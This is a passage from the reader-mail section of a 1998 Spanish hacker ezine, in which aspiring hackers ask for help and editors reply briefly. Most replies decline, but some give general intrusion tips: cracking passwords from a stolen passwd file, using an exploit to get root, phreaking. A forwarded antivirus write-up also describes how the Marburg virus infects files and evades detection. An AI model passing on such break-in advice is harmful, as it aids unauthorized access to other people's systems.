- From: scarcamo@xxxxxxxxxxxxxx (Sergio Antonio Carcamo Villegas)
- Subject: necesito tu ayuda !!!
-
- hola Conde Vampiro , espero que bien, sabes necesito tu ayuda sobre los
- hackers , ya que mi intencion es convertirme en uno de uds, pero para
- propositos en beneficios de los demas, como por ejemplo acabar con la
- pornografia infantil., etc
-
- asi que necesito saber como empiezo, que debo estudiar.
-
- espero que me contestes porque estare esperando tu rspuesta... se
- despide un amigo chileno Sergio Carcamo.
-
- PD: Es bueno la organizacion donde estas J.J.F hackers.... :-)
-
- por favor escribeme ya...
-
- <------>
-
- [ Pues lo de siempre, lee este ezine y todo lo que puedas. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 10 Sep 1998 12:06:27 GMT
- From: "Japer,s.c." <pilatos@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Aprendiz de Hacker
-
- Hola que pasha tio, te mande un mail pero no me contestaste y espero que
- si lo hagas ahora a mi direccion nueva que es chenatiun@xxxxxxxxxxxxxx
-
- <------>
-
- [ No se que mail te refieres ya que recibo muchos, ademas contestamos
- mediante el ezine. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 06 Sep 1998 15:09:28 GMT
- From: "Aztech's Mail" <aztech@xxxxxxxxxxxxxx>
- To: Desconocido
- Subject: AYUDA
-
- Que onda te leo en la revista, ya se que no dan clases particulares, pero
- pues dices que cualquier duda que tengamos contigo mero, pues yo soy muy
- obediente, mira estoy tratando un sistema AIX 3, no se si me puedas
- ayudar?
-
- Esto es lo que tengo, su escaneado de puertos, su fichero passwd, con
- shadow, que lo saque mediante un bug del send mail, que puedo hacer para
- entrar, no se, una sugerencia, con exploits que conoscas para este sistema
- operativo o algo por el estilo.
-
- De antemano gracias
-
- AZTECH
-
- <------>
-
- [ Pues ahora solo te queda averiguar los password y te conectas por telnet
- y asi empiezas, pero ante todo no inflinjas ningun daño al sistema, ya
- que entonces no eres un Hacker. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 04 Sep 1998 05:08:50 GMT
- From: "KraKen ." <enter_logon@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Traduccion de boxes
-
- Aupa tios!. Antes de nada, tengo q diciros que teneis una Web cojonuda.
- Para ir al grano: podriais traducirme la Lunch Box?. Es que mi ingles
- es penoso. Gracias de todas formas.
- Ah!, otra cosa (es una hipotesis): si yo tuviera un amigo imbecil
- perdido, y quisiera joderle, sabiendo que a una hora determinada va a
- estar conectado podria de alguna manera meterme en su PC, aprovechando
- eso de lo bidireccional de la conexion, o es una fantasmada de esas q
- solo se ven en la tele?. Si se puede podriais decirme como? (repito que
- es solo una hipotesis).
- Gracias
-
- <------>
-
- [ Thx pero por ahora nadie de - J.J.F. / Hackers Team - traduzira ese
- documento, si algun lector esta interesado pues que nos envie la
- traduccion. Para metodos de entrada leete bien este ezine. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 18 Aug 1998 07:52:44 GMT
- From: PlaXiuS <plaxius@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Gracias!!!
-
- Muchas Gracias Conde_Vampiro por tu apreciacion y tu opinion ... la
- publicaremos en el numero 3 de Proyecto_R que se va a demorar un poquito
- ya que tenemos unos articulos bastantes extensos que deseamos entregar.
- La verdad es bastante duro mantener un magazine en especial cuando los
- colaboradores brillan por su ausencia. Bueno ahi va mi PGP por si acaso.
- normalmente no la uso ya que no tengo nada que ocultar hee pero si
- tienes algo personal que contarnos ahi esta !!!! Quiero felicitarte por
- el enfoque que le has dado a JJF , sobre el hacking como arte ya que no
- incitan a la ilegalidad como otras E-Zine , ni al anarquismo y esas
- cosas !!!! buen camino amio .
-
- Saludos Terricolas !!!!
-
- PlaXiuS
-
- <------>
-
- [ Thx y muy interesante Proyecto R. Hasta la vista, compañero. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 31 Oct 1998 23:22:02 GMT
- From: leandro moises <leandro2000@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
-
- HOLA QUE TAL ACA LES ESCRIVO DESDE ARGENRINA Y LA VERDAD ME GUSTO
- MUCHO SU WEB ,BUENO VOY AL GRANO LA VERDAD UNOS DE LOS TEMAS QUE MAS
- ME GUSTARIA SAVER Y ME INTERESASN SON EL PRHach y por su puesto en
- segundo lugar todo ACERCA DEL HACK,CRACK.ETC
- BUENO LA VERDAD ES QUE YA NO SE QUE HACER POR QUE ME HE VAJADO
- CUALQUIER CLASE DE PROGRAMAS ,DOCUMENTO Y ESA CASAS Y LA VERDAD E
- LEIDO PROBADO CON TODO SIN UN SIMPLE RESULTADO . BUENO DESDE ACA LES
- PIDO PORFAVOR UN CONSEJO UNA AYUDA PARA PODER INTERIORIZXARME E HACER
- ALGO UTIL MUCHAS GRACIAS Y ESTA NO EL APRIMERA VEZ QUE LOS VOY A JODER.
- SE LOS PROMETO
-
- 5D2
-
- <------>
-
- [ Pues primero lo mejor es aprender a escribir correctamente :)
- Nuestro consejo, es el de siempre, lee este ezine y todo lo que puedas
- con mucha atencion, investiga y saca tus propias conclusiones. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 31 Oct 1998 15:28:35 GMT
- From: Javier <jjavierr@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hola!!!
-
- Hola Conde Vampiro
- Quiseria que me mandaras unos manuales para hacker windows95 asi como para
- cambiar la fastidiosa pantalla al inicar windows.
- Por favor te lo agradecieria muchoá
-
- <------>
-
- [ Sorry, pero nosotros no enviamos nada, leer FAQ. Te recomiendo que leas
- este numero, que seguro que te sorprendera con agrado. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Nestor <nesertzen@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hola
-
- Hola conde
- que tal... soy un aprendiz de hacker....bueno a menos quiero serlo....
- me gusto mucho su pagina la J.J.J HACKERS TEAM, todavia no estoy a la
- altura como para estar en su team, pero me esforsare por seguir
- intenandolo... tengo una duda y espero que me pueda ayudar, que tengo que
- hacer con la Llave Publica PGP JJF, tengo que compilarla?, en que lenguaje?
- o solo la pongo en el espacio de password,me gustaria que me respondas...
- tambien me gustaria ayudar a romper el algoritmo pero realemte no tengo ni
- idea de como hacerlo si me dan una idea lo intentare
- gracias
-
- Nestor
-
- <------>
-
- [ Lo primero, escribe nuestro nombre correctamente. Para usar la llave PGP,
- necesitas el programa PGP, en la documentacion veras como se usa :)
- Supongo que te refieres al RC5, pues lee la seccion de
- NOTICIAS UNDERGROUND para mas informacion. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 29 Oct 1998 13:19:53 GMT
- From: Javier <jjavierr@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hola!!!!!! ATTE Zero^CooL
-
- Hola Conde Vampiro te mando un grato saludo.
- Como soy nuevo en lo de los hacker, quisiera que me dijeras ujnos prgramas
- que debe tener cualquier hacker pues no se mucho de esto te agradeciera
- que me dieras el nombre y si puedes la pagina de donde bajarlos.
-
- BYE.
-
- <------>
-
- [ Hombre, programas de hackers ahi mil, tambien depende de lo que hagas,
- lo mejor que puedes hacer es probar por ti mismo y asi decides cual te
- gusta mas. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "LUIS S. GONZALEZ A." <gonzalezluis@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: union
-
- Iluestre CV.
- Deseo ser parte del y ayudar en lo posible para que este proyecto llegue
- a su feliz y deseada culminacion.
- Unidos venceremos.
-
- <------>
-
- [ Pues para ser sincero no se a que proyecto te refieres. Si es al de RC5,
- pues adelante ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 02 Nov 1998 14:48:09 GMT
- From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Dear Amigos...
-
- Que tal... se que es un poco ortodoxo pero bien, quiero felicitarlos por
- los numeros del e-zine, me los he bajado todos y bien... hay muchas
- cosas de las cuales no entiendo un pomo pero otras me parecen muy
- dulces... soy de Argentina y quisiera mandarles unas trampillas que he
- descubierto para que la publiquen en su proximo e-zine... esta es
- referente a como poder pasar por alto el menu logico de un telefono
- semi-publico de este mi pais... bue... si les interesa la idea me
- gustaria me den un breve OK ! para saber si estamos en linea... Ah !
- otra cosa, ando en busca de un buen GURU que se quiera hacer cargo de la
- tutela de este aprendiz de Hacker, si alguien esta interesado en
- transmitir algunos de sus conocimientos con este personaje que hoy les
- escribe estaria muy very agradecido...
-
- Un abrazo viejitos...
-
- Lautaro (hombregenetica)
-
- <------>
-
- [ Pues enviamos esos trucos, que te los ponemos encantados :)
- Nosotros no damos clases privadas, pero si algun lector esta interesado
- en darte clases, pues ya os pondremos en contacto. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 02 Nov 1998 05:05:14 GMT
- From: Dago@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
- Subject: e-zine
-
- hola soy de Argentina necesitaria por favor si me pueden enviar
- las JJF de la numero seis en adelante ya que son muy dificiles de
- conseguir y no tengo internet, pero si correo electronico,
- me las podrias enviar por e-mail, muchas gracias
- espero las revistas.
-
- pdta: Enviame cualquier otro e-zine similar a las JJF (se que las
- tienen)
- mas que gracias
- Dago
-
- <------>
-
- [ Este es el numero 7, el ultimo que hemos sacado, y no enviamos nada.
- Muy gracioso, que te hace pensar que si no enviamos ni siquiera nuestro
- ezine, te vayamos a enviar otros ezines? ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 30 Oct 1998 17:32:05 GMT
- From: "Alejandro Loureda" <aloureda@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: QUE PASA!!!!!!
-
- QUE PASA CON LOS VIRUS, QUE NO LOS PUEDO CARGAR, A VER SI ME DAIS UNA
- SOLUCION, NECESITO JODER A LA ARMADA ESPAñOLA, ESTOY HACIENDO LA PUTA
- MILI Y !!MILAGRO!!! SOY EL ENCARGADO DE LOS ORDENADORES DE UNA
- FRAGATA....... PERO EL ULTIMO ARRESTO ME LO PAGAN. A VER SI ME PODEIS
- MANDAR ALGO FUERTE O RECOMENDARMELO LO NECESITO PARA DESCARGAR
- ADRENALINA, COLABORAR CON LA PATRIA NO? ME TIENEN HASTA LOS HUEVOS
-
- <------>
-
- [ Y como es que estas de encargado si ni siquiera puedes ejecutar un
- simple virus? Ademas siendo el admin deberias saber que no es correcto
- destrozar sistemas informaticos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 30 Oct 1998 11:58:07 GMT
- From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: QUERIDOS FRIEND's
-
- Que tal soy Lautaro... un pequeño aprendiz de hackers en Argentina, bien
- los molesto por lo siguiente, quisiera saber si existe la posibilidad de
- que me envien algun programita o link para bajarlo que tenga la funcion
- de encontrar la clave para acceder a computadoras conectadas a intranet
- con la pc que yo trabajo... es decir, cuando abro el explorador de
- windows quiero entrar a otras pc┤s via red las cuales tienen su clave de
- acceso... esto no tiene niguna malicia solo es el hecho de hacerlo...
- Bueno quedo a sus ordenes y muchas gracias... un abrazo
-
- Lautaro
-
- <------>
-
- [ Sorry, pero no enviamos nada, mira nuestro FAQ. Y para eso, lee bien este
- ezine :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 29 Oct 1998 15:29:15 GMT
- From: Juvenal Medina V. <juvenal.medina@xxxxxxxxxxxxxx>
- Subject: Hola !!.
-
- Hola.
-
- Antes que nada, felicidades, su pagina es excelente, pero les escribo para
- pedirles de Favor , si es posible me ense±en a ser Hacker, hace como 3
- semanas tuve problemas con uno, pero ya se calmo, y eso me hizo pensar que
- podria ser hacker con su ayuda, para defenderme de personas malas...
-
- Gracias..
-
- Escriban Pronto
-
- Juvenal
-
- <------>
-
- [ Pues para eso esta este ezine, pero para defender de "malas personas" no
- necesitas ser un Hacker, simplemente debes tomar ciertas medidas de
- seguridad. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 29 Oct 1998 14:44:02 GMT
- From: eugenio fourt de lacruz <imagen@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: aprendiz
-
- Les escribo desde Chile. Estuve navegando en vuestro web y quede maravillado
- de saber de que todo lo que se habla de los hackers, es real. Estoy
- realmente muy interesado en aprender todo lo referente a los mecanismos de
- seguridad informatica. Estoy recien partiendo y me gustaria pedirles
- humildemente, si me pueden interiorizar mas del tema. Sobre todo, en la
- terminologia. Que es Hackear, Crackear, Phreaking, etc. Baje algunos
- programas y archivos de los que ustedes ofrecen. Me gustarφa saber usarlos,
- pero debo partir por el principio. Si me pueden instruir, aunque sea un
- simple barniz sobre el tema, se los agradeceria mucho. Aqui en Chile, hasta
- donde yo se, no se practica el Hacker (o como se diga).
-
- Gracias por recibir la nota.
-
- Eugenio.
- imagen@xxxxxxxxxxxxxx
-
- <------>
-
- [ Bueno en Chile se esta comenzado, acaso no conoces Proyecto R, el primer
- ezine underground chileno :) Pues para ello lee este ezine. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 24 Oct 1998 08:11:06 GMT
- From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
- Subject: Holaz ;)
-
- Me mola el rollo eszte, veo que sabeis. Oz mando ezte emilioz para que
- mireiz en mi peichz y la evalueiz, si no es mucho pedir, firmarz en mi
- librillo. Mi correo no es este, conque os pido que noz mandeis nada, para
- que no se entere ;)
- Mi emilio ez arargon_1@xxxxxxxxxxxxxx o uCaLu@xxxxxxxxxxxxxx okiz? hasta la
- proximaz.
-
- <------>
-
- [ Leete nuestro FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
- Subject: holaz ;)
-
- Perdonar tios, antes no os he dado la peich XDDDDD. Soy la lexe, la peich
- es: http://come.to/pagina.de.BuSeS
-
- <------>
-
- [ Recibido :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 04 Nov 1998 17:04:25 GMT
- From: "bk abarca" <wktnoo@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Subdito suyo.
-
- Hola Sr.Conde
- Soy un joven de 20 años de Sn JosΘ,Costa Rica.
- Estudio Diseño Grafico en mi paφs.
- Deseo que usted me ayude a evacuar algunas dudas con
- repecto a algunos terminos usados para denotar elementos
- para el uso de hackers.
- Espero que pueda ayudarme ya que me gustaria saber tanto
- como usted, por eso lo escogφ a usted para que me expli
- cara porque creo que es el que mßs sabe del grupo sin despreciar
- a nadie.
- Para no aburrirlo mßs,empiezo.
- NOTA: Las cosas no tiene que explicarlas tanto ya que
- mas o menos conozco de internet, chats, hardward y software, etc.
- LA RESPUESTA PUEDE SER EN INGLES
-
- - Que son SCRIPTS
- scripts con respecto a obtener passwords y bloquear ordenadores.
-
- - Que es un LAMER
-
- - Que es el mundo UNIX
- eso con respecto a cambiar mi verdadero nombre de usuario.
-
- - Como hago los BOTS.
-
- - Que es C
-
- - Como hago para usar el programa TLO que sirve para hacer
- llamadas al extranjero.
-
- Espero de antemano me pueda ayudar.
- Cuando quiera puede venir a mi pais y conocer,nada mas diga
- ......................ya tiene hospedaje.
-
- -GRACIAS-
-
- <------>
-
- [ Como ya bien sabras no damos clases privadas y ni por asomo soy el
- mejor de - J.J.F. / Hackers Team -, leer FAQ. Tus respuestas seran
- en español para que todos los lectores lo entiendan bien :)
-
- - Los script son ficheros que se escriben usando los comandos del
- sistema operativo para hacer operaciones mas rapidas. En unix
- tienes varios shell script's, en MS-DOS tiene los ".bat".
-
- - El termino "lamer", que es usando erroneamente por la mayoria, es para
- describir a una persona de estupido, no tiene nada que ver con las
- ganas de aprender y/o novato, lamer es un insulto.
-
- - Unix es un sistema operativo y no tiene nada que ver con cambiar de
- nombre de usuario.
-
- - Busca esa informacion por el cyberespacio. Generalmente estan hechos en
- C.
-
- - C, es un lenguaje de programacion.
-
- - No conozco ese programa que mencionas. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 05 Nov 1998 09:25:17 GMT
- From: "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Hacker!!
-
- Salu2, quisiera unirme a su equipo de Hackers..... pero no se como, me
- dicen que baje un programa, pero me marca error!!!
-
- He leido 3 de sus e-zine y me parecen fantasticos, tengo algo de
- experiencia con UNIX.....
-
- Espero respuesta Hackers....
-
- <------>
-
- [ Supongo que te refieres al JJF RC5 Crack Team, pues para unirte lee bien
- la seccion de NOTICIAS UNDERGROUND. Pues vas algo atrasado ya que este
- es el nunero 7 :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 07 Nov 1998 11:59:20 GMT
- From: "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hacker!!!
-
- Quiero unirme a su grupo, pero no se como contribuir en el e-zine!!!
-
- <------>
-
- [ Sorry, pero - J.J.F. / Hackers Team - es un grupo cerrado, pero si que
- puedes contribuir con el ezine, escribiendo sobre algo que te interese.
- Te recomiendo leer el FAQ. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 09 Nov 1998 14:41:58 GMT
- From: "osenk dest" <accord@xxxxxxxxxxxxxx>
- To: <"conde_vampiro@usa.net">
-
- me han dicho que eres un maquina y me quieroponer en contacto conmigo
-
- <------>
-
- [ Bueno, para empezar no soy ningun maquina, simplemente una persona con
- ganas de conocer, y si quieres algo, pues escribe un mail en
- condiciones. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "carlos saavedra" <carlosaave@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: pregunta
-
- Hola conde vampiro, te escribo para decirte que estoy interesado en
- aprender muchas cosas, sobre lo que ustedes hacen, me gustaria que me
- dijeras que significan terminos como h/v/p, craking, hacking, phreaking,
- para poder investigar sobre eso, y si tu me mandaras informacon te lo
- agradeceria mucho, ya que estoy interesado en aprender alguna de estas
- modalidades.
-
- Me gustaria ser tu aprendiz para convertirme en un hacker, no para
- causar destrosos, sino para aprender cosas que pocas personas saben y
- para atacar paginas que atenten contra muchos principios, si me
- respondieras te estaria muy agradecido, asi que por favor hazlo y estare
- esperando tu mensaje.
-
- <------>
-
- [ Te recomiendo leer nuestro FAQ y todos tus dudas seran contestadas. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: manic_miner@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
- Subject: Hola !
-
- Estimados amigos de JJFHackersTeam !
-
- Me interesaria que me den su opinion de mi pagina, la direccion de esta es:
- http://www.geocities.com/SiliconValley/Pines/4539/index.html
-
- A todo esto, que saben de saqueadores y raregazz ?.
-
- <------>
-
- [ Leete nuestro FAQ. Sobre saqueadores (SET) y Raregazz, pues que siguen
- trabajando como siempre y desde aqui les enviamos un saludo :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 08 Nov 1998 16:41:55 GMT
- From: "HACKCOL TROJANS" <hackcol_trojans@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Felicitaciones!!!!
-
- Bueno primero quisiera felicitarlos por el exelente web y E-ZINE que
- tienen...
- Les escribo por que quiero que conozcan el grupo al que pertenesco, pues
- quisiera que entablaramos una comunicaci≤n mßs continua para tener una
- relacion como colegas; el grupo se llama (HACKCOL TROJANS)y somos un
- grupo muy nuevo, y estamos muy interesados en relacionarnos con otros
- grupos de hackers. nosotros somos de colombia..
-
- Quisiera pedirles unos consejitos para nuestro grupo ya que ustedes
- llevan mas tiempo como grupo...
-
- estamos en construccion de nuestro web, y quisieramos estar al dia con
- todo lo relacionado con este gran mundo del hacker por ello les pido si
- conocen algunas buenas listas de correo me digan ..... no importa si
- estan en ingles.
-
- Creo que una idea muy buena para todos los del hack y principalmente
- para los grupos que ya estan establecidos seria crear una lista de
- correo para que los grupos como JJF,hackcol trojans y muchos mßs
- estuvieran en contacto y compartieramos mucha informacion valiosa; les
- digo esto a ustedes pues deben conocer mßs grupos y si estan interesados
- les diran para hacerlo realidad...
- Les agradesco mucho por lo que hacen por todos los hackers del mundo
- hispano pues creo que los E-ZINES les han sido de gran utilidad como lo
- fue para los de hackcol trojans....
-
- espero este e-mail salga en el E-ZINE #7..
- GRACIAS...
-
- chao.
- ATT
- <<<<<<<<<<<<<<<<<<<<<<<!!DaRk PoIsOn!!>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- ********************^^HACKCOL TROJANS^^***************************
-
- <------>
-
- [ Thx, nosotros ya tenemos un mailing list propio pero no esta enfocado a
- estos temas, te recomiendo el numero pasado en el cual mencionabamos
- un excelente mailing list en espa±ol. Si quieres estar en contacto basta
- que escribas mail's o pases por el website. Un saludo
- - J.J.F. / Hackers Team -. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 15 Nov 1998 17:34:10 GMT
- From: "Ezequiel Panza" <ezequielpanza@xxxxxxxxxxxxxx>
- Subject: Necesito su ayuda!!!
-
- Hola, Soy Conan de Argentina, esoy realmente interesado en saber de que
- manera puedo acceder a telenet, teniendo en cuenta que estoy en Argentina,
- no existe ningun local dialup para mi pero son embargo existe la
- posibilidad que pueda accesar a telenet por medio de algun tipo de terminal
- anexa a travez de la concexion de internet. Si es asi me gustaria que me
- dijeran de que manera lo puedo conseguir ya que luego de accesar a una
- terminal de estas, me es imposible conectarme a otra maquina desde la misma.
- Desde ya muchas gracias.
-
- La interrogante seria entonces: Como puedo tener acceso a telenet???
-
- <------>
-
- [ Has pensado en alguna forma de "realizar una llamada" al dialup aunque
- no sea local. En estos casos ahi que trabajar el aspecto phreak. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "PaMaX" <pamax@xxxxxxxxxxxxxx>
- To: "Conde Vampiro"
- Subject: Unas preguntilas
-
- Hola que tal....
- Su pagina es "La MeJoR", se los digo porque entre varias veces y porque me
- copa su e-zine.....
- Yo queria pedierte un favorcito.....En mi maquina tengo el Windows 98 (una
- mierda) pero sin el no puedo usar un toco de programas que necesito....
- Bue' aca van mis preguntas
- 1) Como hago para hackear redes novell que trabajan en DOS..... Es la red
- del colegio....cada uno tiene una cuenta pero yo quiero entrar a la del
- profesor (supongamos que conozco el login pero no el password).
- 2) Tambien queria saber como hackear una pagina de unos amigos mios (entrar
- y modificarla)
- 3) Pensaras que soy un poco estupido pero Que es hacer telnet y como se usa
- ese programa.....
-
- P.D me gustaria que explicaras algo sobre hacking en windows, ya se que es
- una mierda pero es lo que usa la mayoria (de los usuarios comunes)
-
- PD hay alguna forma de obtener cuentas de internet hackeando a alguna
- persona en IRC
-
- Bueno espero que me contestes, nos vemos........byez.....
-
- <------>
-
- [ Para eso esta este ezine :) Por cierto, no envies cosas raras y basta
- que envies los mail's una vez. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 14 Nov 1998 19:15:50 GMT
- From: "bull150" <fishing247@xxxxxxxxxxxxxx>
- Subject: help!!
-
- Hello i'm looking for a hacker ar a program to help me. I got a game called
- mplayer poker 1.0 on the net and i play a lot i need a program to go in and
- get my fake money to change had some but they changed upgraded or something
- to beta and they don't work anymore been looking all over and noone can
- help. Please send any info or something to me. If you can do it or have
- someone who can it is at www.mplayer.com thxs and please write back soon.
-
- <------>
-
- [ You should use a crack. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 14 Nov 1998 15:38:35 GMT
- From: "Heitor Filho" <hroriz@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: help me
-
- hi. im trying to get root access to a unix system. but i cant get the
- /etc/security/shadow file. how can i get it?
-
- thanks for the attention
-
- exp2222
-
- <------>
-
- [ To obtain a copy of the shadow you must be root, but there are some tool
- you can use unless you aren't root to get it. I suggest that you use some
- kind of exploit to become root. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 11 Nov 1998 05:04:48 GMT
- From: Ramon <astruc@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Sobre virus muy raro que preguntaba ZeD en ultima revista
-
- Hola:
-
- Sobre la consulta de un virus raro, ahi va la respuesta facilitada por
- PANDA
-
- El antivirus PANDA detecta perfectamente este virus.
-
- Nombre: Win95/Marburg.
-
- Origen: España.
- Fecha: Mayo 1998.
- Tamaño aproximado: 8.000 bytes.
- Caracteristicas: Accion directa y polimorfico.
-
- Descripcion: Se trata de un virus polimorfico para Windows 95 de
- accion directa. Al ejecutar un fichero infectado por el virus este
- infecta ficheros PE (portable ejecutable) del directorio actual asi
- como de los directorios Windows y System. Por un fallo en el virus no
- funciona en Windows NT, solo en Window 95 o Windows 98.
-
- Cuando un fichero infectado se ejecuta el virus busca las rutinas del
- KERNEL32: primero busca GetModuleHandleA y GetProcAddress y luego
- otras 22 funciones mas. Durante la infeccion el virus usa un metodo
- similar al del Win32/Cabanas, analiza la tabla importada del fichero
- para GetModuleHandleA y GetProcAddress, y guarda esa direccion en el
- codigo del virus, si no hay esas entradas en la tabla el virus
- analiza el codigo del KERNEL32.
-
- Si el virus no es capaz de localizar las funciones del KERNEL32
- retorna al codigo del fichero inicial. De todas formas reserva un
- bloque de memoria del sistema, copia en el su codigo (lo necesita
- para ejecutar el polimorfismo) y busca los ficheros para infectarlos.
-
- El virus escribe su codigo al final de los archivos aumentando el
- tamaño de estos en unos 8.000 bytes, tras salvar su codigo en el
- fichero el virus lo encripta con su rutina polimorfica. Dependiendo
- de la estructura del fichero el virus hace varios trucos para hacer
- la deteccion y desinfeccion mas compleja: reemplaza la direccion de
- comienzo en la cabecera PE por la suya, o salva la instruccion de
- salto al virus en la direccion de comienzo del fichero y no modifica
- la cabecera, o escribe en el punto de entrada una rutina polimorfica
- "basura" seguida de la instruccion de salto al virus.
-
- Antes de infectar los ficheros el virus borra los siguientes ficheros
- de datos de antivirus: Anti-vir.dat, chklist.ms, avp.crc y ivb.ntz.
- Mientras infecta el virus chequea los nombres de los ficheros y no
- infecta aquellos que tienen la letra "V" asi como los antivirus
- Panda, F-prot y Scan.
-
- Dependiendo de la fecha del sistema (en los 3 meses siguientes a la
- infeccion cuando un fichero infectado es ejecutado a la misma hora en
- que se produjo la infeccion) el virus saca en posiciones aleatorias
- de la pantalla el icono de error estandar (un circulo rojo con una
- cruz blanca).
-
- El virus contiene el siguiente texto:
-
- " GetModuleHandleA GetProcAddress CreateFileA CreateFileMappingA
- MapViewOfFile UnmapViewOfFile CloseHandle FindFirstFileA
- FindNextFileA
- FindClose VirtualAlloc GetWindowsDirectoryA GetSystemDirectoryA
- GetCurrentDirectoryA SetFileAttributesA SetFileTime DeleteFileA
- GetCurrentProcess WriteProcessMemory LoadLibraryA GetSystemTime
- GetDC
- LoadIconA DrawIcon
-
- [ Marburg ViRuS BioCoded by GriYo/29A ]
- KERNEL32.dll USER32.
-
- Saludos :)
-
- astruc@smileyface.com
- http://www.olivet.com/astruc/index.htm32.
-
- <------>
-
- [ Thx por el aviso y ya esta aqui la respuesta para Zed. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 22 Nov 1998 08:50:08 GMT
- From: vicente corral collantes <vinny@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: (no subject)
-
- Necesito un buen hacker capaz de entrar en una pagina web, en el disco
- duro de unas personas, no son organismos oficiales, pagare el trabajo,
- un saludo.
- Gracias.
-
- <------>
-
- [ XDDDDD si lo hicieramos por dinero lo mas seguro a estas alturas
- seriamos millonarios, leete nuestro FAQ y olvidamos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 20 Nov 1998 07:22:19 GMT
- From: "ALEJANDRO VALENTIN" <a080879@xxxxxxxxxxxxxx>
- Subject: Hola Me estoy iniciando
-
- HEY conde te habla un futuro hackers quieri si tu puedes desde luego que
- me mandes por un e- mail todo lo referente al negocio del hackeo ya que no
- se absolutamente nada pero te aclaro que solo hago esto por aprender a
- manipular un virus por saber rebentar sistemas, en fin por aprender si
- puedes me mandas un algoitmo pßra hacer los virus ya que no pude entra a
- esta seccion del la pagina
-
- Recuerda mandarme trucos que un experto hacker no olbida
-
- <------>
-
- [ El hacking no es un negocio y si tantas ganas tienes de aprender lee bien
- este ezine. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Guillermo Suarez" <glsuarez@xxxxxxxxxxxxxx>
- To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx>
- Subject: Saludo
-
- Hola Conde !
-
- Espero que estes bien.
-
- Te escribo con el animo de decirte que me parece formidable el trabajo del
- web JJF Hackers Team y me gustaria preguntarte acerca de que si sabes algo
- acerca de los hackers en Colombia; ya que yo soy de Cali (Colombia) y me
- gustaria saber como poder ingresar al mundo de los Hackers, Crackers, etc.
-
- Agradezco tu pronta respuesta y disculpa las molestias.
-
- Atte
-
- Memo
-
- <------>
-
- [ Pues realmente no se como estan las cosas por Colombia, se que hemos
- recibido mail's de gente por alli, si os interesa os podemos poner en
- contacto. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Alejandro Alan Dominguez Perez <al751181@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: preguntas
-
- Buenos X:
-
- Me encontraba chateando en el mirc cuando me llego un mail de una
- persona que me decia que el podia cambiar la pogramacion de las tarjetas
- inteligentes de los sistemas de television por satelite digitales es
